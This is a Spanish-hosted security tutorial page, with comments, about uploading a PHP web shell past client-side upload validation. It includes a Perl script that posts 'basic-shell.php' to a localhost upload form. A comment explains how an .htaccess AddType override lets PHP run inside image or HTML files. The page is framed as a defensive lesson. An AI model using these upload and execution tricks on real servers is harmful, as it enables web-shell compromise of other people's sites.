Bilbao Digital

Asociación para la Cualificación y el Aprendizaje Permanente

  • Full Screen
  • Wide Screen
  • Narrow Screen
  • Increase font size
  • Default font size
  • Decrease font size

PHP shell upload III

E-mail Imprimir PDF

video content  Defense and attack. Client side validation using javascript and actionscript.

The dynamic action attribute of the form tag is received from the swf file depending on the file that is being uploaded. We will decompile it for academic purposes. Disabling javascript we block the information exchange and then, add the right action target by editing the HTML form.

Anyhow, an attacker doesn't need any HTML form to upload a file. It can be done, for example, using a Perl script.

#!/usr/bin/perl
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://localhost/demo3/upload3.php',
    Content_Type => 'form-data',
    Content => [userfile => ["basic-shell.php", "basic-shell.php"],],);
print $res->as_string();

This is the bottom line of client side validation.

Comentarios (3)add comment
...
escrito por willemkenn , 10, enero, 2009

nice video...have you tried inserting a php shell code in .HTML?
report abuse
vote down
vote up

Votos: +0

...
escrito por Carlos Sánchez , 10, enero, 2009

A php file is interpreted by php process following the Apache AddType directive:

# AddType application/x-httpd-php .php

The AddType directive defines MIME type and file extension pairs. For example, using PHP4, use the AddType directive to make the Web server recognize with PHP file extensions (.php4, .php3 .phtml .php) as PHP MIME types.

To allow the server to read php script inserted into another file extension you must edit the httpd.conf file or, in the hacker side, upload a .htaccess file to the same folder to override the Apache configuration:

AddType application/x-httpd-php .php .jpg .gif .htm .html

Remember to try this on localhost ;-).

report abuse
vote down
vote up

Votos: +8

thanks
escrito por willemkenn , 29, enero, 2009

Thank you... smilies/smiley.gif
report abuse
vote down
vote up

Votos: +0


Escribir comentario
menor | mayor
password
 

busy
You are here: Home